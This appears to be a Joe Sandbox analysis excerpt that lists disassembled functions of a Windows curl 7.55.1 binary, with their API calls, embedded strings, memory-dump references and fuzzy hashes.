Instruction ID: ebeadaf438ea1795782cd3153c9860d909f91d2c632e1161c3bf6f5fa498737c
Opcode Fuzzy Hash: 592eae184c67aac37ca0021fe992a8c0f832ade09a7e0f21f7ec28b7cf7977fa
Instruction Fuzzy Hash: C8310161A0DA4791EB65BB65D4503B9E350EF48780FC40032DA7E8B2D5EF7CE449E3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D06CD4 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D06C80: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06CA6
Part of subcall function 00007FF7F8D06C80: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06CC5

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06D4E
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D06DA8

Strings

Protocols: , xrefs: 00007FF7F8D06D13
Release-Date: %s, xrefs: 00007FF7F8D06CF9
%s , xrefs: 00007FF7F8D06D2F, 00007FF7F8D06D8B
Features: , xrefs: 00007FF7F8D06D61
curl 7.55.1 (Windows) %s, xrefs: 00007FF7F8D06CE6
[unreleased], xrefs: 00007FF7F8D06CF2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: puts$__acrt_iob_func__stdio_common_vfprintf
String ID: %s $Features: $Protocols: $Release-Date: %s$[unreleased]$curl 7.55.1 (Windows) %s
API String ID: 1995075677-1211838556
Opcode ID: 1accf5a72dd6a4eed95d6f573e2881219f83543aa2d5184bc90e0274b82108cf
Instruction ID: ed6da72c95fc6d23a55f4f5b07970dfb43d2af6e937177c934d61d4e181cc063
Opcode Fuzzy Hash: 1accf5a72dd6a4eed95d6f573e2881219f83543aa2d5184bc90e0274b82108cf
Instruction Fuzzy Hash: 8021C921A18A0691EB14BB21F8442B8E760EF5C754FC84136D53D062E9EF2CE54CE3E8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D415EC Relevance: 13.7, APIs: 4, Strings: 5, Instructions: 245COMMON

Download Yara Rule

Strings

InitializeSecurityContext failed: %s, xrefs: 00007FF7F8D41928
%s/%s, xrefs: 00007FF7F8D41650
HTTP, xrefs: 00007FF7F8D41600
Negotiate, xrefs: 00007FF7F8D41697, 00007FF7F8D4178E
SPNEGO handshake failure (empty challenge message), xrefs: 00007FF7F8D4186D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: %s/%s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)
API String ID: 1294909896-3696550590
Opcode ID: 94d7fe1659370ef29a4583caa8c44e372ae377573aa2d7c76aac579256db8951
Instruction ID: c66e32f66abb6c3fa40212382c4ec7807e355b725a428d66b1ff230122bf18c7
Opcode Fuzzy Hash: 94d7fe1659370ef29a4583caa8c44e372ae377573aa2d7c76aac579256db8951
Instruction Fuzzy Hash: 83B14F32609B4686EB109F26F4501A9F3A8FF48784F884076DEAE43B94DF3CE409D794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3CF98 Relevance: 13.7, APIs: 5, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D1D7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D1EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D25B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D271

Strings

UIDVALIDITY, xrefs: 00007FF7F8D3D0D7
SECTION, xrefs: 00007FF7F8D3D14A
PARTIAL, xrefs: 00007FF7F8D3D182
UID, xrefs: 00007FF7F8D3D112

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: PARTIAL$SECTION$UID$UIDVALIDITY
API String ID: 1294909896-4241916623
Opcode ID: 5575cbe3dcb876df732ec74319d28c455a42f79baf2a3df8ce200ac81d9127a9
Instruction ID: b59bd73e1f68d4dbeb01590a9e4d498151c13766e4b5351c361b083281d1bb1e
Opcode Fuzzy Hash: 5575cbe3dcb876df732ec74319d28c455a42f79baf2a3df8ce200ac81d9127a9
Instruction Fuzzy Hash: 9FA1F76290CA8285FB21EB61D80057CE7A4FF4DBD4F984132DE6D836D1CE2CD549B7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3D370 Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 137COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D490
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D4C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D4FB

Strings

NTLM, xrefs: 00007FF7F8D3D377
CONNECT, xrefs: 00007FF7F8D3D380
Proxy-, xrefs: 00007FF7F8D3D492, 00007FF7F8D3D553
%sAuthorization: NTLM %s, xrefs: 00007FF7F8D3D49F, 00007FF7F8D3D560

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: %sAuthorization: NTLM %s$CONNECT$NTLM$Proxy-
API String ID: 1294909896-1963909029
Opcode ID: 3736cea0bb1a2c34ddb2429edd407646aa63b5375f1bf1fca037c041a0adc4a8
Instruction ID: 4c609e58f12bf46a0831d1d9f0b5e152b52530b8c89859eeb065f16dafb58744
Opcode Fuzzy Hash: 3736cea0bb1a2c34ddb2429edd407646aa63b5375f1bf1fca037c041a0adc4a8
Instruction Fuzzy Hash: 75514D35A09A4285EB61AB52F8447A9E364FF4DB88F884031DE6D8B3D0EE3CD049E754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1FBF4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 147stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FCDE
strchr.LIBVCRUNTIME ref: 00007FF7F8D1FD12
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FD38
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1FDE4

Strings

%s%s%s, xrefs: 00007FF7F8D1FC8A
Connecting to hostname: %s, xrefs: 00007FF7F8D1FDAB
Connecting to port: %d, xrefs: 00007FF7F8D1FDFF

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strchrstrtol
String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
API String ID: 137861075-1840313707
Opcode ID: 96bb8bf37a7f1b29450a3bd90f1fbcd15455606420cfcb411577c3662ce3d14e
Instruction ID: bd3ee5a9b3ade60950aff312a246042b6319340b8c5db3ef182f761d72adf878
Opcode Fuzzy Hash: 96bb8bf37a7f1b29450a3bd90f1fbcd15455606420cfcb411577c3662ce3d14e
Instruction Fuzzy Hash: CE51D46260CEC280FB71AF35A8403B9E790AF49BA4F884235DD6D476C5CE3CD549A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D26F80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32 ref: 00007FF7F8D26FC3
inet_pton.WS2_32 ref: 00007FF7F8D26FF5
__swprintf_l.LIBCMT ref: 00007FF7F8D27059
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D2707E
WSAGetLastError.WS2_32 ref: 00007FF7F8D270BB

Strings

getaddrinfo() failed for %s:%d; %s, xrefs: 00007FF7F8D270CE
init_resolve_thread() failed for %s; %s, xrefs: 00007FF7F8D27091

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: inet_pton$ErrorLast__swprintf_l_errno
String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
API String ID: 4235329958-1389973398
Opcode ID: 07359c1ea5bac126babf869e1e33155a058d4e5252691af74224b37241d4aefd
Instruction ID: 32f614b91b659e504cb569c81459de5e7458aeac6a552cf008b5f730e82c104f
Opcode Fuzzy Hash: 07359c1ea5bac126babf869e1e33155a058d4e5252691af74224b37241d4aefd
Instruction Fuzzy Hash: F741B262B08A0296F710FB629440AFDE3A1BF49B98F854035DE2D577C5DE38D50EE3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D39A78 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF7F8D39AE5
htons.WS2_32 ref: 00007FF7F8D39AFB
send.WS2_32 ref: 00007FF7F8D39B96
WSAGetLastError.WS2_32 ref: 00007FF7F8D39BA0
send.WS2_32 ref: 00007FF7F8D39BE2
WSAGetLastError.WS2_32 ref: 00007FF7F8D39BEC

Strings

Sending data failed (%d), xrefs: 00007FF7F8D39BA6, 00007FF7F8D39BF2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLasthtonssend
String ID: Sending data failed (%d)
API String ID: 2027122571-2319402659
Opcode ID: 9912b01933f5dcd75e21ab68b37d4110e85310cbefb5777e8cbbc792cda17809
Instruction ID: 1fcbbe456a5c92fa33fe6a05d06f2c3fa8eb866062d8c882d9dbcd247329192b
Opcode Fuzzy Hash: 9912b01933f5dcd75e21ab68b37d4110e85310cbefb5777e8cbbc792cda17809
Instruction Fuzzy Hash: B541B132708A8691EB04AF35D4546A8F720FB59F88F848632DB6D07798DF7CD04AE359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D311F8 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 107COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D31213
_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D31363

Strings

gfff, xrefs: 00007FF7F8D312EE
2, xrefs: 00007FF7F8D3131C
Connection time-out, xrefs: 00007FF7F8D31236
gfff, xrefs: 00007FF7F8D31281
set timeouts for state %d; Total %ld, retry %d maxtry %d, xrefs: 00007FF7F8D3133C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _time64
String ID: 2$Connection time-out$gfff$gfff$set timeouts for state %d; Total %ld, retry %d maxtry %d
API String ID: 1670930206-13630374
Opcode ID: 9c389e7095b100bfe67e1fe2159cbe924afc5a989db150ba623b16a898bcfdcf
Instruction ID: 5b0dee0f4ef1474d58848daaa3c7819d996a7d35caf3d8bd6f309e939f839367
Opcode Fuzzy Hash: 9c389e7095b100bfe67e1fe2159cbe924afc5a989db150ba623b16a898bcfdcf
Instruction Fuzzy Hash: 2041C4B6B0860686DB24DF2AE04056CB7A4FB9CF48F544136EA1DC7788DE38E545D784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D38340 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D38379
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3840F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D38435
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D38456

Strings

QUIT, xrefs: 00007FF7F8D38368
Failure sending QUIT command: %s, xrefs: 00007FF7F8D3838C
", xrefs: 00007FF7F8D383BB

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_cwprintf_s_l
String ID: "$Failure sending QUIT command: %s$QUIT
API String ID: 2020354070-4038173491
Opcode ID: 7490a0e6b991acf88320d5db9cf54888be0e142dd9567c0bdf4decb33f71f7f9
Instruction ID: c71b3041281c26164711f719bc4d2fc26740f17470b581dae8a3c470854ca627
Opcode Fuzzy Hash: 7490a0e6b991acf88320d5db9cf54888be0e142dd9567c0bdf4decb33f71f7f9
Instruction Fuzzy Hash: 08313C21B0DA8691FB14AB25E5543BDE791FF4DB48F880035CA2D4B2D1CF6DE059A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3679C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D367E3
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D36835

Strings

ACCT %s, xrefs: 00007FF7F8D3682B
ACCT requested but none available, xrefs: 00007FF7F8D3684A
PASS %s, xrefs: 00007FF7F8D367CF
Access denied: %03d, xrefs: 00007FF7F8D3689B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: ACCT %s$ACCT requested but none available$Access denied: %03d$PASS %s
API String ID: 2941638530-2304280848
Opcode ID: f96b070ad755c29d2e43b67ae99b433f69721f0275251ecc226ff64650d08fa5
Instruction ID: 7cdf6b14f53b9f6355a5dd597bb7bfe766815518658bda2b23213580c28a8a79
Opcode Fuzzy Hash: f96b070ad755c29d2e43b67ae99b433f69721f0275251ecc226ff64650d08fa5
Instruction Fuzzy Hash: 742164A1D0C78290FF90AB19E4447B8E290AF4D754FC84036DD2D4A2D1EF6DA58DB3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07810 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F8D07852
SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F8D07890
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D0789A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F8D078B8
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D078C0

Strings

Failed to set filetime %ld on outfile: SetFileTime failed: GetLastError %u, xrefs: 00007FF7F8D078A3
Failed to set filetime %ld on outfile: CreateFile failed: GetLastError %u, xrefs: 00007FF7F8D078C9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleTime
String ID: Failed to set filetime %ld on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %ld on outfile: SetFileTime failed: GetLastError %u
API String ID: 1269242970-3682749385
Opcode ID: 4071e6dd32300ba6e4a3f3850a189359ca93319df8c800741c8821b52f9c8241
Instruction ID: e277695a46df5ad1f505ca4665700f0fa7f2cae9f2400dbdff3a978849ad91ce
Opcode Fuzzy Hash: 4071e6dd32300ba6e4a3f3850a189359ca93319df8c800741c8821b52f9c8241
Instruction Fuzzy Hash: B0118E31B0C64182E714AB52B4543AAF660EF88BE4F844635D96E0ABD8DF7CE009DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D46B78 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 273COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46C87
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D46CE6

Strings

%s/%s, xrefs: 00007FF7F8D46BF1
GSSAPI, xrefs: 00007FF7F8D46B83
GSSAPI handshake failure (empty challenge message), xrefs: 00007FF7F8D46E13
Kerberos, xrefs: 00007FF7F8D46C35, 00007FF7F8D46D24

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc
String ID: %s/%s$GSSAPI$GSSAPI handshake failure (empty challenge message)$Kerberos
API String ID: 2803490479-3513357789
Opcode ID: 2bce60dd646ec84f7810cbd7a83d7125c7a8c57d4552ea3013e5742b1315ca6a
Instruction ID: 47c7d777bf32805626920ffcd742b2831fb0bcb70fd593887d0d5a147b603681
Opcode Fuzzy Hash: 2bce60dd646ec84f7810cbd7a83d7125c7a8c57d4552ea3013e5742b1315ca6a
Instruction Fuzzy Hash: 4AC14932A09B4685EB10EF66F8502A9B7A4FF4CB84F880076DE5E47794EF38D448D754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D37D70 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37E2E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37E4F
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37E75
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37E96
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37EB3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37F0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37F6E

Strings

Wildcard - Parsing started, xrefs: 00007FF7F8D37FAD

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$calloc
String ID: Wildcard - Parsing started
API String ID: 3095843317-2274641867
Opcode ID: c9a8a571f490a9d25679ea69989963843689939123e3b118d4891a39b1b71923
Instruction ID: 39ba62958c44a34312ff5dac8497fdf00ff50598a1bb5d211b837bff47e51b01
Opcode Fuzzy Hash: c9a8a571f490a9d25679ea69989963843689939123e3b118d4891a39b1b71923
Instruction Fuzzy Hash: E871B965609A86C2EB14EB21F854379E3A4FF4CB80F894475CB6E47790DF3CE448A398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D33580 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

Authentication failed: %d, xrefs: 00007FF7F8D336B5
PASS %s, xrefs: 00007FF7F8D33681
STARTTLS denied, xrefs: 00007FF7F8D33756
Access denied. %c, xrefs: 00007FF7F8D33656
Authentication cancelled, xrefs: 00007FF7F8D3372E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: Access denied. %c$Authentication cancelled$Authentication failed: %d$PASS %s$STARTTLS denied
API String ID: 0-2817885744
Opcode ID: 8aa6ce998cb5a0aba754eae7e0078e27743b6c05c27113e29ff1ea1d4817fa90
Instruction ID: 1535dbdff42bf4d324f71820f7f8f4e0b758ce469c29a76d023202783f011dbf
Opcode Fuzzy Hash: 8aa6ce998cb5a0aba754eae7e0078e27743b6c05c27113e29ff1ea1d4817fa90
Instruction Fuzzy Hash: BA5193A1E0C24346F76CBB29E6043B9E351AF49788F944131D52D46AD5DE6CE44CF3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D02548 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00000000,00007FF7F8D01893,?,?,?,00007FF7F8D0172A), ref: 00007FF7F8D025D6

Strings

\\?\, xrefs: 00007FF7F8D0260D
|<>"?*, xrefs: 00007FF7F8D0265B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc
String ID: \\?\$|<>"?*
API String ID: 2803490479-3264285191
Opcode ID: ab5e173786eb27a97f70c7eb0357122ce0d35f7974788f83e036f76b89f1a07e
Instruction ID: 93b88d04c5255fbf690302e35b4bf72bdf330bcbd7c0fd4871ce126d4946713b
Opcode Fuzzy Hash: ab5e173786eb27a97f70c7eb0357122ce0d35f7974788f83e036f76b89f1a07e
Instruction Fuzzy Hash: A151D411E0E68341FB67AF119944379EE916F1CB94FC84131CEBD062C9DE7CA84DA3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2E694 Relevance: 10.6, APIs: 7, Instructions: 130networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FF7F8D2E6BF
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E730
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E77A
